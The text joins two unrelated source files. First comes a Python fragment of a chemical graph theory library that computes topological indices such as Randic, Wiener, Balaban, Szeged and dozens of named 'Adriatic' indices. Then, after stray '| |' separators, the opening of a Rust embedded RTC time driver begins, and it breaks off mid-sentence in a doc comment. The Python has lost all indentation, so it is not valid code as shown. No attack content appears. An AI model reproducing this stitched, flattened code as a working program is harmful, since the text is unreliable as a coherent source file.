def sum_connectivity_index(self):
""" Sum-Connectivity index"""
E = self.edges() # E - all edges
if len(E) == 0: return 0
return np.float64(
np.sum([(self.degrees()[u] + self.degrees()[v])**(-0.5)
for (u, v) in E],
dtype=np.longdouble))
def geometric_arithmetic_index(self):
""" Geometric-Arithmetic index"""
E = self.edges() # E - all edges
if len(E) == 0: return 0
return np.float64(
np.sum([2.0 * np.sqrt(self.degrees()[u] * self.degrees()[v]) /
(self.degrees()[u] + self.degrees()[v]) for (u, v) in E],
dtype=np.longdouble))
def eccentric_connectivity_index(self):
""" Eccentric Connectivity Index
The molecular graph must be connected, otherwise the function returns False"""
if not self.is_connected():
return False
return sum(map(lambda a, b: a * b, self.degrees(),
self.eccentricity()))
def randic_index(self):
""" Randic Index
The molecular graph must contain at least one edge, otherwise the function returns False
Randic Index is a special case of Connectivity Index with power = -1/2"""
return self.connectivity_index(-0.5)
def atom_bond_connectivity_index(self):
""" Atom-Bond Connectivity Index (ABC) """
s = np.longdouble(0) # summator
for u, v in self.edges():
d1 = np.float64(self.degrees()[u])
d2 = np.float64(self.degrees()[v])
s += np.longdouble(((d1 + d2 - 2) / (d1 * d2))**.5)
return np.float64(s)
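# Example (comment only): each edge (u, v) contributes
# sqrt((d_u + d_v - 2) / (d_u * d_v)). For P3 both edges join degrees 1 and 2,
# contributing sqrt(1/2) each, so ABC(P3) = 2/sqrt(2) = sqrt(2) ~ 1.4142.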
def estrada_index(self, matrix="adjacency"):
""" Estrada Index (EE)
args:
matrix -- see spectrum for help, default value is 'adjacency'
There is an alias 'distance_estrada_index' for distance matrix
"""
return np.float64(
np.sum([np.exp(x.real) for x in self.spectrum(matrix)],
dtype=np.longdouble))
def distance_estrada_index(self):
""" Distance Estrada Index (DEE)
Special case of Estrada index with distance matrix
"""
return self.estrada_index('distance')
def degree_distance(self):
""" Degree Distance (DD)
The molecular graph must be connected, otherwise the function returns False"""
if not self.is_connected():
return False
dd = np.matrix(self.degrees()) * self.distance_matrix().sum(axis=1)
return dd[0, 0]
def reverse_degree_distance(self):
""" Reverse Distance Degree (rDD)
The molecular graph must be connected, otherwise the function returns False"""
if not self.is_connected():
return False
return 2 * (self.order() - 1) * len(
self.edges()) * self.diameter() - self.degree_distance()
def molecular_topological_index(self):
""" (Schultz) Molecular Topological Index (MTI)
The molecular graph must be connected, otherwise the function returns False"""
if not self.is_connected():
return False
# (A+D)*d
A = np.matrix(self.__A)
d = np.matrix(self.degrees())
return np.float64(
((A + self.distance_matrix()) * d.T).sum(dtype=np.longdouble))
def eccentric_distance_sum(self):
""" Distance Sum
The molecuar graph must be connected, otherwise the function Return False"""
if not self.is_connected():
return False
return (self.eccentricity() * self.distance_matrix().sum(axis=1))[0, 0]
# strange - it is slow ((
def balaban_j_index(self):
""" Balaban J index
The molecular graph must be connected, otherwise the function returns False"""
if not self.is_connected():
return False
ds = self.distance_matrix().sum(axis=1)
m = len(self.edges())
k = (m / (m - self.__Order + 2.0))
return np.float64(
k *
np.sum([1 / np.sqrt(ds[u][0, 0] * ds[v][0, 0])
for (u, v) in self.edges()],
dtype=np.longdouble))
def sum_balaban_index(self):
""" Sum Balaban index
The molecular graph must be connected, otherwise the function returns False"""
if not self.is_connected():
return False
ds = self.distance_matrix().sum(axis=1)
m = len(self.edges())
k = (m / (m - self.__Order + 2.0))
return np.float64(
k *
np.sum([1 / np.sqrt(ds[u][0, 0] + ds[v][0, 0])
for (u, v) in self.edges()],
dtype=np.longdouble))
def kirchhoff_index(self):
""" Kirchhoff Index (Kf)
Kf = 1/2 * sum_i sum_j RD[i,j]
Based on resistance distance matrix RD
Alias: resistance
The molecular graph must be connected, otherwise the function returns False
"""
if not self.is_connected():
return False
return np.float64(
self.resistance_distance_matrix().sum(dtype=np.longdouble) / 2)
resistance = kirchhoff_index
def wiener_index(self):
""" Wiener Index (W)
W = 1/2 * sum_i sum_j D[i,j]
where D is distance matrix
The molecular graph must be connected, otherwise the function returns False
"""
if not self.is_connected():
return False
return self.distance_matrix().sum(dtype=np.float64) / 2
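# Example (comment only): W sums every pairwise distance once. For P3 the
# distances are d(0,1) = d(1,2) = 1 and d(0,2) = 2, so wiener_index() = 4.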
def terminal_wiener_index(self):
""" Calculate Terminal Wiener Index (TW)
TW = Sum of all distances between pendent vertices (with degree = 1)
"""
if not self.is_connected(): return False
s = 0
for u in range(self.order()):
if self.degrees()[u] != 1: continue
for v in range(u + 1, self.order()):
if self.degrees()[v] == 1:
s = s + self.distance_matrix()[u, v]
return s
def reverse_wiener_index(self):
""" Reverse Wiener Index (RW)
RW = 1/2 * sum_i!=j ( d - D[i,j] )
where D is distance matrix and d is diameter
The molecular graph must be connected, otherwise the function returns False
"""
if not self.is_connected():
return False
# here we use formula: RW = 1/2 * n * (n-1) * d - W
return self.diameter() * (
self.__Order * (self.__Order - 1)) / 2 - self.wiener_index()
def hyper_wiener_index(self):
""" Hyper-Wiener Index (WW)
WW = 1/2 * ( sum_ij d(i,j)^2 + sum_i_j d(i,j) )
where D is distance matrix
The molecuar graph must be connected, otherwise the function Return False
"""
if not self.is_connected():
return False
return (
np.power(self.distance_matrix(), 2).sum() +
self.distance_matrix().sum()) / 4 # since we have symmetric matrix
def harary_index(self):
""" Harary Index (H)
H = 1/2 sum_i sum_j Rd[i,j]
where Rd is reciprocal distance matrix
Rd[i,j] = 1 / D[i,j] for D[i,j] != 0
Rd[i,j] = 0 otherwise
The molecular graph must be connected, otherwise the function returns False
"""
if not self.is_connected():
return False
return np.float64(
self.reciprocal_distance_matrix().sum(dtype=np.longdouble)) / 2
def LEL(self):
""" Return Laplacian-like energy (LEL) """
return np.float64(
np.sum([np.sqrt(x) for x in self.spectrum('laplacian')],
dtype=np.longdouble))
def multiplicative_sum_zagreb_index(self):
""" Log( Multiplicative Sum Zagreb index )"""
d = self.degrees()
return np.float64(
np.sum([np.log(np.float64(d[u] + d[v]))
for (u, v) in self.edges()],
dtype=np.longdouble))
def multiplicative_p2_zagreb_index(self):
"""Calculates Log( Multiplicative P2 Zagreb index )"""
d = self.degrees()
return np.float64(
np.sum([np.log(np.float64(d[u] * d[v]))
for (u, v) in self.edges()],
dtype=np.longdouble))
def multiplicative_p1_zagreb_index(self):
"""Calculates Log( Multiplicative P1 Zagreb index )"""
d = self.degrees()
return np.float64(
np.sum([np.log(np.float64(d[v]**2)) for v in self.vertices()],
dtype=np.longdouble))
def szeged_index(self):
"""Calculates Szeged index"""
if not self.is_connected():
return False
s = 0
D = self.distance_matrix()
for u, v in self.edges():
diff = D[u, :] - D[v, :]
s += (diff > 0).sum() * (diff < 0).sum()
return float(s)
def revised_szeged_index(self):
"""Calculates Revised Szeged index"""
if not self.is_connected():
return False
s = 0.0
D = self.distance_matrix()
for u, v in self.edges():
diff = D[u, :] - D[v, :]
o = (diff == 0).sum()
s += ((diff > 0).sum() + .5 * o) * ((diff < 0).sum() + .5 * o)
return s
def homo_lumo_index(self):
"""Calculates HOMO-LUMO index"""
if not self.is_connected():
return False
n = self.order()
if n % 2 == 0:
h = int(n / 2 -
1) # because array indices start from 0 instead of 1
l = int(h + 1)
return max([abs(self.spectrum()[h]), abs(self.spectrum()[l])])
# else:
h = int((n - 1) / 2)
return abs(self.spectrum()[h])
HL_index = homo_lumo_index
# Adriatic indices
# DEPRECATED
# use mathchem.all_adriatic()
def all_adriatic(self):
""" Generate all possible parameters sets for adriatic indices"""
r = []
for p in [0, 1]:
for i in [1, 2, 3]:
for j in range(1, 9):
if i == 3:
for a in [0.5, 2]:
r.append((p, i, j, a))
elif i == 2 and j in range(1, 6):
for a in [-1, -0.5, 0.5, 1, 2]:
r.append((p, i, j, a))
elif i == 2 or i == 1:
for a in [0.5, 1, 2]:
r.append((p, i, j, a))
return r
def adriatic_name(self, p, i, j, a):
""" Return the name for given parameters of Adriatic indices"""
#(j)
name1 = {1:'Randic type ',\
2:'sum ',\
3:'inverse sum ', \
4:'misbalance ', \
5:'inverse misbalance ', \
6:'min-max ', \
7:'max-min ', \
8:'symmetric division '}
# (i,a)
name2 = {(1, 0.5):'lor',\
(1,1):'lo', \
(1,2):'los', \
(2,-1):'in', \
(2, -0.5):'ir', \
(2, 0.5):'ro', \
(2,1):'', \
(2,2):'s', \
(3, 0.5):'ha', \
(3,2):'two'}
#(p)
name3 = {0: 'deg', 1: 'di'}
return (name1[j] + name2[(i, a)] + name3[p])
def _adriatic_entry_(self, du, dv, i, j, a):
""" Return an individual edge contribution for Adriatic indices and matrices"""
# phi(x,a)
phi = {
1: lambda x, a: np.log(x)**a,
2: lambda x, a: x**a,
3: lambda x, a: a**x
}
# gamma (x,y)
gamma = {\
1: lambda x,y: x*y,\
2: lambda x,y: x+y,\
3: lambda x,y: 0 if x+y==0 else 1.0/(x+y),\
4: lambda x,y: abs(x-y),\
5: lambda x,y: 0 if x==y else 1.0/abs(x-y),\
6: lambda x,y: 0 if max(x,y)==0 else min(x,y)/max(x,y),\
7: lambda x,y: 0 if min(x,y)==0 else max(x,y)/min(x,y),\
8: lambda x,y: 0 if x==0 or y==0 else x/y+y/x}
return gamma[j](phi[i](du, a), phi[i](dv, a))
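# Example (comment only): an Adriatic index sums gamma(phi(d_u, a), phi(d_v, a))
# over all edges. With p=0 (vertex degrees), i=2 (phi = x**a), j=1
# (gamma = x*y) and a=-0.5 this gives the sum over edges of (d_u*d_v)**(-0.5),
# i.e. adriatic_index(0, 2, 1, -0.5) recovers the classical Randic index
# (exposed as randic_type_irdeg_index in the named wrappers that follow).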
def adriatic_matrix(self, p, i, j, a):
""" Return the Adriatic matrix with given parameters"""
if p == 0: d = self.degrees()
else: d = self.distance_matrix().sum(axis=0).tolist()[0]
AM = [[0] * self.order() for k in range(self.order())]
for u, v in self.edges():
AM[u][v] = AM[v][u] = self._adriatic_entry_(
np.float64(d[u]), np.float64(d[v]), i, j, a)
return AM
def adriatic_index(self, p, i, j, a):
""" Return the Adriatic index with given parameters"""
if p == 0: d = self.degrees()
else: d = self.distance_matrix().sum(axis=0).tolist()[0]
return np.float64(
np.sum([self._adriatic_entry_(np.float64(d[u]), np.float64(d[v]),
i, j, a) for (u, v) in self.edges()],
dtype=np.longdouble))
# Adriatic indices by names
def randic_type_lordeg_index(self):
""" Adriatic index: Randic type lordeg index"""
return self.adriatic_index(0, 1, 1, 0.5)
def randic_type_lodeg_index(self):
""" Adriatic index: Randic type lodeg index"""
return self.adriatic_index(0, 1, 1, 1)
def randic_type_losdeg_index(self):
""" Adriatic index: Randic type losdeg index"""
return self.adriatic_index(0, 1, 1, 2)
def sum_lordeg_index(self):
""" Adriatic index: sum lordeg index"""
return self.adriatic_index(0, 1, 2, 0.5)
def sum_lodeg_index(self):
""" Adriatic index: sum lodeg index"""
return self.adriatic_index(0, 1, 2, 1)
def sum_losdeg_index(self):
""" Adriatic index: sum losdeg index"""
return self.adriatic_index(0, 1, 2, 2)
def inverse_sum_lordeg_index(self):
""" Adriatic index: inverse sum lordeg index"""
return self.adriatic_index(0, 1, 3, 0.5)
def inverse_sum_lodeg_index(self):
""" Adriatic index: inverse sum lodeg index"""
return self.adriatic_index(0, 1, 3, 1)
def inverse_sum_losdeg_index(self):
""" Adriatic index: inverse sum losdeg index"""
return self.adriatic_index(0, 1, 3, 2)
def misbalance_lordeg_index(self):
""" Adriatic index: misbalance lordeg index"""
return self.adriatic_index(0, 1, 4, 0.5)
def misbalance_lodeg_index(self):
""" Adriatic index: misbalance lodeg index"""
return self.adriatic_index(0, 1, 4, 1)
def misbalance_losdeg_index(self):
""" Adriatic index: misbalance losdeg index"""
return self.adriatic_index(0, 1, 4, 2)
def inverse_misbalance_lordeg_index(self):
""" Adriatic index: inverse misbalance lordeg index"""
return self.adriatic_index(0, 1, 5, 0.5)
def inverse_misbalance_lodeg_index(self):
""" Adriatic index: inverse misbalance lodeg index"""
return self.adriatic_index(0, 1, 5, 1)
def inverse_misbalance_losdeg_index(self):
""" Adriatic index: inverse misbalance losdeg index"""
return self.adriatic_index(0, 1, 5, 2)
def min_max_lordeg_index(self):
""" Adriatic index: min-max lordeg index"""
return self.adriatic_index(0, 1, 6, 0.5)
def min_max_lodeg_index(self):
""" Adriatic index: min-max lodeg index"""
return self.adriatic_index(0, 1, 6, 1)
def min_max_losdeg_index(self):
""" Adriatic index: min-max losdeg index"""
return self.adriatic_index(0, 1, 6, 2)
def max_min_lordeg_index(self):
""" Adriatic index: max-min lordeg index"""
return self.adriatic_index(0, 1, 7, 0.5)
def max_min_lodeg_index(self):
""" Adriatic index: max-min lodeg index"""
return self.adriatic_index(0, 1, 7, 1)
def max_min_losdeg_index(self):
""" Adriatic index: max-min losdeg index"""
return self.adriatic_index(0, 1, 7, 2)
def symmetric_division_lordeg_index(self):
""" Adriatic index: symmetric division lordeg index"""
return self.adriatic_index(0, 1, 8, 0.5)
def symmetric_division_lodeg_index(self):
""" Adriatic index: symmetric division lodeg index"""
return self.adriatic_index(0, 1, 8, 1)
def symmetric_division_losdeg_index(self):
""" Adriatic index: symmetric division losdeg index"""
return self.adriatic_index(0, 1, 8, 2)
def randic_type_indeg_index(self):
""" Adriatic index: Randic type indeg index"""
return self.adriatic_index(0, 2, 1, -1)
def randic_type_irdeg_index(self):
""" Adriatic index: Randic type irdeg index"""
return self.adriatic_index(0, 2, 1, -0.5)
def randic_type_rodeg_index(self):
""" Adriatic index: Randic type rodeg index"""
return self.adriatic_index(0, 2, 1, 0.5)
def randic_type_deg_index(self):
""" Adriatic index: Randic type deg index"""
return self.adriatic_index(0, 2, 1, 1)
def randic_type_sdeg_index(self):
""" Adriatic index: Randic type sdeg index"""
return self.adriatic_index(0, 2, 1, 2)
def sum_indeg_index(self):
""" Adriatic index: sum indeg index"""
return self.adriatic_index(0, 2, 2, -1)
def sum_irdeg_index(self):
""" Adriatic index: sum irdeg index"""
return self.adriatic_index(0, 2, 2, -0.5)
def sum_rodeg_index(self):
""" Adriatic index: sum rodeg index"""
return self.adriatic_index(0, 2, 2, 0.5)
def sum_deg_index(self):
""" Adriatic index: sum deg index"""
return self.adriatic_index(0, 2, 2, 1)
def sum_sdeg_index(self):
""" Adriatic index: sum sdeg index"""
return self.adriatic_index(0, 2, 2, 2)
def inverse_sum_indeg_index(self):
""" Adriatic index: inverse sum indeg index"""
return self.adriatic_index(0, 2, 3, -1)
def inverse_sum_irdeg_index(self):
""" Adriatic index: inverse sum irdeg index"""
return self.adriatic_index(0, 2, 3, -0.5)
def inverse_sum_rodeg_index(self):
""" Adriatic index: inverse sum rodeg index"""
return self.adriatic_index(0, 2, 3, 0.5)
def inverse_sum_deg_index(self):
""" Adriatic index: inverse sum deg index"""
return self.adriatic_index(0, 2, 3, 1)
def inverse_sum_sdeg_index(self):
""" Adriatic index: inverse sum sdeg index"""
return self.adriatic_index(0, 2, 3, 2)
def misbalance_indeg_index(self):
""" Adriatic index: misbalance indeg index"""
return self.adriatic_index(0, 2, 4, -1)
def misbalance_irdeg_index(self):
""" Adriatic index: misbalance irdeg index"""
return self.adriatic_index(0, 2, 4, -0.5)
def misbalance_rodeg_index(self):
""" Adriatic index: misbalance rodeg index"""
return self.adriatic_index(0, 2, 4, 0.5)
def misbalance_deg_index(self):
""" Adriatic index: misbalance deg index"""
return self.adriatic_index(0, 2, 4, 1)
def misbalance_sdeg_index(self):
""" Adriatic index: misbalance sdeg index"""
return self.adriatic_index(0, 2, 4, 2)
def inverse_misbalance_indeg_index(self):
""" Adriatic index: inverse misbalance indeg index"""
return self.adriatic_index(0, 2, 5, -1)
def inverse_misbalance_irdeg_index(self):
""" Adriatic index: inverse misbalance irdeg index"""
return self.adriatic_index(0, 2, 5, -0.5)
def inverse_misbalance_rodeg_index(self):
""" Adriatic index: inverse misbalance rodeg index"""
return self.adriatic_index(0, 2, 5, 0.5)
def inverse_misbalance_deg_index(self):
""" Adriatic index: inverse misbalance deg index"""
return self.adriatic_index(0, 2, 5, 1)
def inverse_misbalance_sdeg_index(self):
""" Adriatic index: inverse misbalance sdeg index"""
return self.adriatic_index(0, 2, 5, 2)
def min_max_rodeg_index(self):
""" Adriatic index: min-max rodeg index"""
return self.adriatic_index(0, 2, 6, 0.5)
def min_max_deg_index(self):
""" Adriatic index: min-max deg index"""
return self.adriatic_index(0, 2, 6, 1)
def min_max_sdeg_index(self):
""" Adriatic index: min-max sdeg index"""
return self.adriatic_index(0, 2, 6, 2)
def max_min_rodeg_index(self):
""" Adriatic index: max-min rodeg index"""
return self.adriatic_index(0, 2, 7, 0.5)
def max_min_deg_index(self):
""" Adriatic index: max-min deg index"""
return self.adriatic_index(0, 2, 7, 1)
def max_min_sdeg_index(self):
""" Adriatic index: max-min sdeg index"""
return self.adriatic_index(0, 2, 7, 2)
def symmetric_division_rodeg_index(self):
""" Adriatic index: symmetric division rodeg index"""
return self.adriatic_index(0, 2, 8, 0.5)
def symmetric_division_deg_index(self):
""" Adriatic index: symmetric division deg index"""
return self.adriatic_index(0, 2, 8, 1)
def symmetric_division_sdeg_index(self):
""" Adriatic index: symmetric division sdeg index"""
return self.adriatic_index(0, 2, 8, 2)
def randic_type_hadeg_index(self):
""" Adriatic index: Randic type hadeg index"""
return self.adriatic_index(0, 3, 1, 0.5)
def randic_type_twodeg_index(self):
""" Adriatic index: Randic type twodeg index"""
return self.adriatic_index(0, 3, 1, 2)
def sum_hadeg_index(self):
""" Adriatic index: sum hadeg index"""
return self.adriatic_index(0, 3, 2, 0.5)
def sum_twodeg_index(self):
""" Adriatic index: sum twodeg index"""
return self.adriatic_index(0, 3, 2, 2)
def inverse_sum_hadeg_index(self):
""" Adriatic index: inverse sum hadeg index"""
return self.adriatic_index(0, 3, 3, 0.5)
def inverse_sum_twodeg_index(self):
""" Adriatic index: inverse sum twodeg index"""
return self.adriatic_index(0, 3, 3, 2)
def misbalance_hadeg_index(self):
""" Adriatic index: misbalance hadeg index"""
return self.adriatic_index(0, 3, 4, 0.5)
def misbalance_twodeg_index(self):
""" Adriatic index: misbalance twodeg index"""
return self.adriatic_index(0, 3, 4, 2)
def inverse_misbalance_hadeg_index(self):
""" Adriatic index: inverse misbalance hadeg index"""
return self.adriatic_index(0, 3, 5, 0.5)
def inverse_misbalance_twodeg_index(self):
""" Adriatic index: inverse misbalance twodeg index"""
return self.adriatic_index(0, 3, 5, 2)
def min_max_hadeg_index(self):
""" Adriatic index: min-max hadeg index"""
return self.adriatic_index(0, 3, 6, 0.5)
def min_max_twodeg_index(self):
""" Adriatic index: min-max twodeg index"""
return self.adriatic_index(0, 3, 6, 2)
def max_min_hadeg_index(self):
""" Adriatic index: max-min hadeg index"""
return self.adriatic_index(0, 3, 7, 0.5)
def max_min_twodeg_index(self):
""" Adriatic index: max-min twodeg index"""
return self.adriatic_index(0, 3, 7, 2)
def symmetric_division_hadeg_index(self):
""" Adriatic index: symmetric division hadeg index"""
return self.adriatic_index(0, 3, 8, 0.5)
def symmetric_division_twodeg_index(self):
""" Adriatic index: symmetric division twodeg index"""
return self.adriatic_index(0, 3, 8, 2)
def randic_type_lordi_index(self):
""" Adriatic index: Randic type lordi index"""
return self.adriatic_index(1, 1, 1, 0.5)
def randic_type_lodi_index(self):
""" Adriatic index: Randic type lodi index"""
return self.adriatic_index(1, 1, 1, 1)
def randic_type_losdi_index(self):
""" Adriatic index: Randic type losdi index"""
return self.adriatic_index(1, 1, 1, 2)
def sum_lordi_index(self):
""" Adriatic index: sum lordi index"""
return self.adriatic_index(1, 1, 2, 0.5)
def sum_lodi_index(self):
""" Adriatic index: sum lodi index"""
return self.adriatic_index(1, 1, 2, 1)
def sum_losdi_index(self):
""" Adriatic index: sum losdi index"""
return self.adriatic_index(1, 1, 2, 2)
def inverse_sum_lordi_index(self):
""" Adriatic index: inverse sum lordi index"""
return self.adriatic_index(1, 1, 3, 0.5)
def inverse_sum_lodi_index(self):
""" Adriatic index: inverse sum lodi index"""
return self.adriatic_index(1, 1, 3, 1)
def inverse_sum_losdi_index(self):
""" Adriatic index: inverse sum losdi index"""
return self.adriatic_index(1, 1, 3, 2)
def misbalance_lordi_index(self):
""" Adriatic index: misbalance lordi index"""
return self.adriatic_index(1, 1, 4, 0.5)
def misbalance_lodi_index(self):
""" Adriatic index: misbalance lodi index"""
return self.adriatic_index(1, 1, 4, 1)
def misbalance_losdi_index(self):
""" Adriatic index: misbalance losdi index"""
return self.adriatic_index(1, 1, 4, 2)
def inverse_misbalance_lordi_index(self):
""" Adriatic index: inverse misbalance lordi index"""
return self.adriatic_index(1, 1, 5, 0.5)
def inverse_misbalance_lodi_index(self):
""" Adriatic index: inverse misbalance lodi index"""
return self.adriatic_index(1, 1, 5, 1)
def inverse_misbalance_losdi_index(self):
""" Adriatic index: inverse misbalance losdi index"""
return self.adriatic_index(1, 1, 5, 2)
def min_max_lordi_index(self):
""" Adriatic index: min-max lordi index"""
return self.adriatic_index(1, 1, 6, 0.5)
def min_max_lodi_index(self):
""" Adriatic index: min-max lodi index"""
return self.adriatic_index(1, 1, 6, 1)
def min_max_losdi_index(self):
""" Adriatic index: min-max losdi index"""
return self.adriatic_index(1, 1, 6, 2)
def max_min_lordi_index(self):
""" Adriatic index: max-min lordi index"""
return self.adriatic_index(1, 1, 7, 0.5)
def max_min_lodi_index(self):
""" Adriatic index: max-min lodi index"""
return self.adriatic_index(1, 1, 7, 1)
def max_min_losdi_index(self):
""" Adriatic index: max-min losdi index"""
return self.adriatic_index(1, 1, 7, 2)
def symmetric_division_lordi_index(self):
""" Adriatic index: symmetric division lordi index"""
return self.adriatic_index(1, 1, 8, 0.5)
def symmetric_division_lodi_index(self):
""" Adriatic index: symmetric division lodi index"""
return self.adriatic_index(1, 1, 8, 1)
def symmetric_division_losdi_index(self):
""" Adriatic index: symmetric division losdi index"""
return self.adriatic_index(1, 1, 8, 2)
def randic_type_indi_index(self):
""" Adriatic index: Randic type indi index"""
return self.adriatic_index(1, 2, 1, -1)
def randic_type_irdi_index(self):
""" Adriatic index: Randic type irdi index"""
return self.adriatic_index(1, 2, 1, -0.5)
def randic_type_rodi_index(self):
""" Adriatic index: Randic type rodi index"""
return self.adriatic_index(1, 2, 1, 0.5)
def randic_type_di_index(self):
""" Adriatic index: Randic type di index"""
return self.adriatic_index(1, 2, 1, 1)
def randic_type_sdi_index(self):
""" Adriatic index: Randic type sdi index"""
return self.adriatic_index(1, 2, 1, 2)
def sum_indi_index(self):
""" Adriatic index: sum indi index"""
return self.adriatic_index(1, 2, 2, -1)
def sum_irdi_index(self):
""" Adriatic index: sum irdi index"""
return self.adriatic_index(1, 2, 2, -0.5)
def sum_rodi_index(self):
""" Adriatic index: sum rodi index"""
return self.adriatic_index(1, 2, 2, 0.5)
def sum_di_index(self):
""" Adriatic index: sum di index"""
return self.adriatic_index(1, 2, 2, 1)
def sum_sdi_index(self):
""" Adriatic index: sum sdi index"""
return self.adriatic_index(1, 2, 2, 2)
def inverse_sum_indi_index(self):
""" Adriatic index: inverse sum indi index"""
return self.adriatic_index(1, 2, 3, -1)
def inverse_sum_irdi_index(self):
""" Adriatic index: inverse sum irdi index"""
return self.adriatic_index(1, 2, 3, -0.5)
def inverse_sum_rodi_index(self):
""" Adriatic index: inverse sum rodi index"""
return self.adriatic_index(1, 2, 3, 0.5)
def inverse_sum_di_index(self):
""" Adriatic index: inverse sum di index"""
return self.adriatic_index(1, 2, 3, 1)
def inverse_sum_sdi_index(self):
""" Adriatic index: inverse sum sdi index"""
return self.adriatic_index(1, 2, 3, 2)
def misbalance_indi_index(self):
""" Adriatic index: misbalance indi index"""
return self.adriatic_index(1, 2, 4, -1)
def misbalance_irdi_index(self):
""" Adriatic index: misbalance irdi index"""
return self.adriatic_index(1, 2, 4, -0.5)
def misbalance_rodi_index(self):
""" Adriatic index: misbalance rodi index"""
return self.adriatic_index(1, 2, 4, 0.5)
def misbalance_di_index(self):
""" Adriatic index: misbalance di index"""
return self.adriatic_index(1, 2, 4, 1)
def misbalance_sdi_index(self):
""" Adriatic index: misbalance sdi index"""
return self.adriatic_index(1, 2, 4, 2)
def inverse_misbalance_indi_index(self):
""" Adriatic index: inverse misbalance indi index"""
return self.adriatic_index(1, 2, 5, -1)
def inverse_misbalance_irdi_index(self):
""" Adriatic index: inverse misbalance irdi index"""
return self.adriatic_index(1, 2, 5, -0.5)
def inverse_misbalance_rodi_index(self):
""" Adriatic index: inverse misbalance rodi index"""
return self.adriatic_index(1, 2, 5, 0.5)
def inverse_misbalance_di_index(self):
""" Adriatic index: inverse misbalance di index"""
return self.adriatic_index(1, 2, 5, 1)
def inverse_misbalance_sdi_index(self):
""" Adriatic index: inverse misbalance sdi index"""
return self.adriatic_index(1, 2, 5, 2)
def min_max_rodi_index(self):
""" Adriatic index: min-max rodi index"""
return self.adriatic_index(1, 2, 6, 0.5)
def min_max_di_index(self):
""" Adriatic index: min-max di index"""
return self.adriatic_index(1, 2, 6, 1)
def min_max_sdi_index(self):
""" Adriatic index: min-max sdi index"""
return self.adriatic_index(1, 2, 6, 2)
def max_min_rodi_index(self):
""" Adriatic index: max-min rodi index"""
return self.adriatic_index(1, 2, 7, 0.5)
def max_min_di_index(self):
""" Adriatic index: max-min di index"""
return self.adriatic_index(1, 2, 7, 1)
def max_min_sdi_index(self):
""" Adriatic index: max-min sdi index"""
return self.adriatic_index(1, 2, 7, 2)
def symmetric_division_rodi_index(self):
""" Adriatic index: symmetric division rodi index"""
return self.adriatic_index(1, 2, 8, 0.5)
def symmetric_division_di_index(self):
""" Adriatic index: symmetric division di index"""
return self.adriatic_index(1, 2, 8, 1)
def symmetric_division_sdi_index(self):
""" Adriatic index: symmetric division sdi index"""
return self.adriatic_index(1, 2, 8, 2)
def randic_type_hadi_index(self):
""" Adriatic index: Randic type hadi index"""
return self.adriatic_index(1, 3, 1, 0.5)
def randic_type_twodi_index(self):
""" Adriatic index: Randic type twodi index"""
return self.adriatic_index(1, 3, 1, 2)
def sum_hadi_index(self):
""" Adriatic index: sum hadi index"""
return self.adriatic_index(1, 3, 2, 0.5)
def sum_twodi_index(self):
""" Adriatic index: sum twodi index"""
return self.adriatic_index(1, 3, 2, 2)
def inverse_sum_hadi_index(self):
""" Adriatic index: inverse sum hadi index"""
return self.adriatic_index(1, 3, 3, 0.5)
def inverse_sum_twodi_index(self):
""" Adriatic index: inverse sum twodi index"""
return self.adriatic_index(1, 3, 3, 2)
def misbalance_hadi_index(self):
""" Adriatic index: misbalance hadi index"""
return self.adriatic_index(1, 3, 4, 0.5)
def misbalance_twodi_index(self):
""" Adriatic index: misbalance twodi index"""
return self.adriatic_index(1, 3, 4, 2)
def inverse_misbalance_hadi_index(self):
""" Adriatic index: inverse misbalance hadi index"""
return self.adriatic_index(1, 3, 5, 0.5)
def inverse_misbalance_twodi_index(self):
""" Adriatic index: inverse misbalance twodi index"""
return self.adriatic_index(1, 3, 5, 2)
def min_max_hadi_index(self):
""" Adriatic index: min-max hadi index"""
return self.adriatic_index(1, 3, 6, 0.5)
def min_max_twodi_index(self):
""" Adriatic index: min-max twodi index"""
return self.adriatic_index(1, 3, 6, 2)
def max_min_hadi_index(self):
""" Adriatic index: max-min hadi index"""
return self.adriatic_index(1, 3, 7, 0.5)
def max_min_twodi_index(self):
""" Adriatic index: max-min twodi index"""
return self.adriatic_index(1, 3, 7, 2)
def symmetric_division_hadi_index(self):
""" Adriatic index: symmetric division hadi index"""
return self.adriatic_index(1, 3, 8, 0.5)
def symmetric_division_twodi_index(self):
""" Adriatic index: symmetric division twodi index"""
return self.adriatic_index(1, 3, 8, 2) | |
time_driver.rs | use core::cell::Cell;
use core::sync::atomic::{compiler_fence, AtomicU32, AtomicU8, Ordering};
use core::{mem, ptr};
use critical_section::CriticalSection;
use embassy::blocking_mutex::raw::CriticalSectionRawMutex;
use embassy::blocking_mutex::CriticalSectionMutex as Mutex;
use embassy::time::driver::{AlarmHandle, Driver};
use crate::interrupt::{Interrupt, InterruptExt};
use crate::{interrupt, pac};
fn rtc() -> &'static pac::rtc0::RegisterBlock {
unsafe { &*pac::RTC1::ptr() }
}
/// Calculate the timestamp from the period count and the tick count.
///
/// The RTC counter is 24 bit. Ticking at 32768 Hz, it overflows every ~8 minutes. This is
/// too short. We must make it "never" overflow.
///
/// The obvious way would be to count overflow periods. Every time the counter overflows,
/// increase a `periods` variable. `now()` simply does `(periods << 24) + counter`. So, the logic
/// around an overflow would look like this:
///
/// ```not_rust
/// periods = 1, counter = 0xFF_FFFE --> now = 0x1FF_FFFE
/// periods = 1, counter = 0xFF_FFFF --> now = 0x1FF_FFFF
/// **OVERFLOW**
/// periods = 2, counter = 0x00_0000 --> now = 0x200_0000
/// periods = 2, counter = 0x00_0001 --> now = 0x200_0001
/// ```
///
/// The problem is this is vulnerable to race conditions if `now()` runs at the exact time an
/// overflow happens.
///
/// If `now()` reads `periods` first and `counter` later, and overflow happens between the reads,
/// it would return a wrong value:
///
/// ```not_rust
/// periods = 1 (OLD), counter = 0x00_0000 (NEW) --> now = 0x100_0000 -> WRONG
/// ```
///
/// It fails similarly if it reads `counter` first and `periods` second.
///
/// To fix this, we define a "period" to be 2^23 ticks (instead of 2^24). One "overflow cycle" is 2 periods.
///
/// - `period` is incremented on overflow (at counter value 0)
/// - `period` is incremented "midway" between overflows (at counter value 0x80_0000)
///
/// Therefore, when `period` is even, the counter is in 0..0x7f_ffff. When odd, it is in 0x80_0000..0xFF_FFFF.
/// This allows now() to return the correct value even if it races an overflow.
///
/// To get `now()`, `period` is read first, then `counter` is read. If the counter value matches
/// the expected range for the `period` parity, we're done. If it doesn't, this means that
/// a new period start has raced us between reading `period` and `counter`, so we assume the `counter` value
/// corresponds to the next period.
///
/// `period` is a 32-bit integer, so it overflows after 2^32 * 2^23 / 32768 seconds of uptime, which is 34865
